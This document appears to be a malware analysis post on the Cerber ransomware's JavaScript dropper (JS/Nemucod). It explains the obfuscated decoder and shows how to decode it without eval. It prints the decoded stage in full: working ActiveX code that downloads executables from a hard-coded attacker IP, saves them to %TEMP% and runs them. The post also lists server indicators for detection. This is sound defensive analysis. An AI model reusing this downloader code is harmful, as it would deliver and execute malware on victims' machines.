
JS/Nemucod.ED!Eldorado – Cerber Ransomware. The JavaScript dropper.

A piece of malware known as Cerber has recently been spotted in the wild. It is spread through phishing emails carrying a .zip attachment that contains a malicious JavaScript file; the idea is to trick the recipient into double-clicking the .js file, which on Windows runs it through Windows Script Host (wscript.exe) rather than a browser — this is what gives the script access to ActiveX objects such as WScript.Shell and ADODB.Stream. The JavaScript is only a dropper whose job is to download the actual malware onto the victim's machine; AV engines detect it as JS/Nemucod.ED!Eldorado. The code reported below is the malicious dropper (in this copy the contents of the encoded payload string have been elided). Warning: this is live malicious code — analyse it only in an isolated environment and never run it outside a sandbox.


// Obfuscation helper: returns one of six short code fragments chosen at random.
// The fragments are "_T", "g.f", "h){", "e(p", "++;" and "].su"; ytzte() splices
// five picks of this function into the decoder source it hands to new Function(),
// and only the right fragment at each gap yields valid JavaScript, so the caller
// (tiins) simply retries until it does. "_T" is never needed and is pure noise.
// Math['rand'+'om'] is just Math.random spelled to defeat simple string matching.
function cjspx()
{
	var mkmpz=new Array("_"+""+"T","g"+"."+"f","h"+")"+""+"{","e"+"("+"p","+"+"+"+";","]"+"."+"su");
	return mkmpz[Math.floor(Math['rand'+new Array('om')[0]]()*mkmpz.length)];
}
// Main routine of the dropper. zkqqd holds the obfuscated payload (elided in this
// copy of the listing). The loop calls ytzte() until it returns without throwing:
// because ytzte() assembles its decoder from random cjspx() picks, nearly every
// attempt produces a SyntaxError from new Function(), which the empty catch block
// swallows. Five independent picks out of six fragments must all be right, so on
// average thousands of iterations run before a valid decoder is built and executed.
// NOTE: a successful iteration does not just decode — the generated decoder ends in
// eval(), so the decoded script is run immediately.
function tiins()
{
	var zkqqd="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"+
	"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"+
	"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"+
	"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"+
	"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"+
	"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"+
	"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"+
	"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";
	var gfltf;
	// Retry forever: each failed decode attempt throws and is silently discarded.
	while(true){
		try
		{
			gfltf=ytzte(zkqqd);
			break;
		}
		catch(er)
		{
			// Deliberate no-op; keeps the exception from escaping the loop.
			var a = 1;
		}
	}
	return gfltf;
}
// Builds the decoder as a source string and compiles it with new Function().
// The five cjspx() calls fill gaps in that string; when every gap receives the
// right fragment the source reads:
//   var ibmqd=cshqx.match(/\S{5}/g),vztbz="",jlawe=0;
//   while(jlawe<ibmqd.length){
//     vztbz+=String.fromCharCode(parseInt(ibmqd[jlawe].substr(3,2),16)^79);
//     jlawe++;
//   }
//   eval(vztbz);
// i.e. split the payload into consecutive 5-character non-whitespace chunks, take
// characters 3-4 of each chunk as a hex byte, XOR it with 79, and eval the result.
// With any other fragment new Function() throws a SyntaxError, which the caller
// relies on to retry. The second and third parameters (wgqod, dsvyh) are unused
// padding. A successful call EXECUTES the decoded payload — never invoke this
// outside a sandbox; rebuild the decoder without the eval() to inspect it instead.
function ytzte(cmift)
{
	return (new Function("cshqx","wgqod","dsvyh","var ibmqd=cshqx.match(/\\S{5}/g),vztbz=\"\",jlawe=0;while(jlawe<ibmqd.lengt"+cjspx()+"vztbz+=Strin"+cjspx()+"romCh"+"arCod"+cjspx()+"arseI"+"nt(ibmqd[jlawe"+cjspx()+"bstr(3,"+"2),1"+"6)^79);jlawe"+cjspx()+"}eval(vztbz);")(cmift,null,null));
}
tiins();

The code is composed of three functions:

• cjspx()

This function returns one of six short code fragments at random. ytzte() uses five such picks to complete the source string it passes to new Function(); only when every pick is the right fragment does the string become syntactically valid code that decodes the obfuscated payload.

• tiins()

This is the main function, containing the malicious obfuscated payload and the logic to de-obfuscate it. The payload is loaded into the variable zkqqd and processed in an infinite loop that ends only when de-obfuscation succeeds. Because cjspx() picks fragments at random, most iterations produce invalid code and new Function() throws a SyntaxError, which the empty catch block swallows; the loop simply retries until a lucky draw yields a valid decoder (on average thousands of attempts, since five independent picks must each hit one specific fragment out of six).

• ytzte(cmift)

This is the function that de-obfuscates the malicious code: it builds the decoder as a string, compiles it with new Function(), and runs it on the payload. The generated decoder ends in eval(), so a successful call also executes the decoded script — which is why the analysis below rebuilds the decoder without the eval.

In order to decode and understand what this dropper is doing we can use the Developer Tools in Chrome (a safe choice here, since the decoded script relies on ActiveX objects that a browser does not expose) and go through three simple steps:

1. Extract all the values from the array allocated in the function cjspx()


2. Rebuild the string used to create the new Function in the ytzte function, choosing at each gap the fragment that gives correct syntax.
We can then write a new function, called test, that decodes the obfuscated payload but returns it instead of eval()-ing it. The regex /\S{5}/g splits the payload into consecutive 5-character non-whitespace chunks; only characters 3 and 4 of each chunk carry data, which is parsed as a hex byte and XORed with the key. Note that the sample shown above XORs with 79 (the `^79` in ytzte); the helper as originally posted used 42, which would not decode this sample.

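/**
 * Decodes a Nemucod payload string the way the decoder generated by ytzte()
 * does, but WITHOUT the trailing eval(): the decoded JavaScript is returned
 * as text so it can be read instead of executed.
 *
 * Encoding (recovered from the string built in ytzte): the payload is split
 * into consecutive 5-character non-whitespace chunks; only characters 3-4 of
 * each chunk carry data, parsed as a hex byte and XORed with the key.
 *
 * @param {string} a - the obfuscated payload (the value of zkqqd).
 * @param {number} [xorKey=79] - XOR key. The sample on this page uses 79
 *   (`^79` in ytzte); the helper as originally posted used 42, which does not
 *   decode this sample. Pass it explicitly for other variants.
 * @returns {string} the decoded script text (also written to the console).
 */
function test(a, xorKey = 79) {
  const chunks = String(a).match(/\S{5}/g);
  // No 5-char chunk at all: nothing to decode (the original crashed on null.length).
  if (chunks === null) {
    return "";
  }
  let decoded = "";
  for (const chunk of chunks) {
    const byte = parseInt(chunk.slice(3, 5), 16);
    decoded += String.fromCharCode(byte ^ xorKey);
  }
  console.log(decoded);
  return decoded;
}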

Some entries in the array (here `_T`) are only noise: none of the five gaps in the ytzte string accepts them, so they are never used when rebuilding the function.

3. Pass the obfuscated payload (the string assigned to zkqqd) to the rebuilt test function — not to the original ytzte, whose generated decoder ends in eval() and would execute the payload — and print the result in the console.
The decoded payload will look like:

// Stage 1 of the decoded payload: synchronous HTTP GET through the MSXML2.XMLHTTP
// ActiveX object (only available under Windows Script Host / IE, not in a modern
// browser). On HTTP 200 the raw response body is handed to callback(body, false);
// any other status, or any exception (object creation failure, network error),
// yields callback(null, true). No error detail ever surfaces — failures are silent.
function getDataFromUrl(url, callback) {
try {
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
// false = synchronous request; the script blocks until the download completes.
xmlHttp.open("GET", url, false);
xmlHttp.send();
if (xmlHttp.status == 200) {
// ResponseBody is the raw byte array, suitable for writing to a binary stream.
return callback(xmlHttp.ResponseBody, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}

// Stage 2: fetch the second-stage executable, trying three hard-coded URLs on the
// same host in order (1.exe, 2.exe, 3.exe) and stopping at the first that returns
// HTTP 200. The nested callbacks implement the fallback chain; only when all three
// fail does callback(null, true) fire. The outer try/catch is belt-and-braces:
// getDataFromUrl already swallows its own exceptions.
// Network indicator: outbound HTTP from wscript.exe to the IP below.
function getData(callback) {
try {
getDataFromUrl("http://89.40.181.39/js/1.exe", function(result, error) {
if (!error) {
return callback(result, false);
} else {
// First URL failed: fall back to the second copy.
getDataFromUrl("http://89.40.181.39/js/2.exe", function(result, error) {
if (!error) {
return callback(result, false);
} else {
// Second URL failed: last attempt.
getDataFromUrl("http://89.40.181.39/js/3.exe", function(result, error) {
if (!error) {
return callback(result, false);
} else {
return callback(null, true);
}
});
}
});
}
});
} catch (error) {
return callback(null, true);
}
}

// Stage 3a: build a drop path in the user's temporary folder. The file name is a
// random base-36 string (up to 9 characters, from Math.random) with an .exe
// extension, so the dropped binary has a different name on every infection — a
// simple evasion against name-based indicators. Returns false if the
// Scripting.FileSystemObject ActiveX object cannot be created.
function getTempFilePath() {
try {
var fs = new ActiveXObject("Scripting.FileSystemObject");
var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
// GetSpecialFolder(2) is the TemporaryFolder constant of the FileSystemObject API.
var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
return tmpFilePath;
} catch (error) {
return false;
}
}

// Stage 3b: write the downloaded bytes to disk through the ADODB.Stream ActiveX
// object. On success callback(path, false) receives the full path of the dropped
// file; if no temp path could be built or any COM call throws, callback(null, true).
// Host indicator: a new .exe written to %TEMP% by a script host process.
function saveToTemp(data, callback) {
try {
var path = getTempFilePath();
if (path) {
var objStream = new ActiveXObject("ADODB.Stream");
objStream.Open();
// Type 1 = adTypeBinary: write the response body as raw bytes, not text.
objStream.Type = 1;
objStream.Write(data);
objStream.Position = 0;
// Second argument 2 = adSaveCreateOverWrite: replace the file if it already exists.
objStream.SaveToFile(path, 2);
objStream.Close();
return callback(path, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
// Stage 4 / entry point of the decoded payload: download -> write to %TEMP% ->
// execute. The dropped executable is launched with WScript.Shell.Run (not
// PowerShell); the empty catch means a failed launch, like every other failure in
// this script, produces no visible error for the victim.
// Host indicator: wscript.exe spawning an .exe located in the user's temp folder.
getData(function(data, error) {
if (!error) {
saveToTemp(data, function(path, error) {
if (!error) {
try {
var wsh = new ActiveXObject("WScript.Shell");
wsh.Run(path);
} catch (error) {}
}
});
}
});

The decoded script downloads an executable from the attacker's server, trying three URLs in turn (1.exe, 2.exe, 3.exe) until one answers with HTTP 200, writes it to the user's temporary folder under a random base-36 name with an .exe extension, and launches it with WScript.Shell.Run (not PowerShell — no PowerShell is involved anywhere in the decoded code). Every failure is silently swallowed, so the victim sees nothing if the download does not succeed. Useful detection points are a script host (wscript.exe/cscript.exe) making outbound HTTP requests via MSXML2.XMLHTTP, and the same process writing and then spawning an .exe from %TEMP%.

Servers observed so far (network indicators; only the first appears in the decoded payload above):

• 89.40.181.39
• i01001.dgn.vn
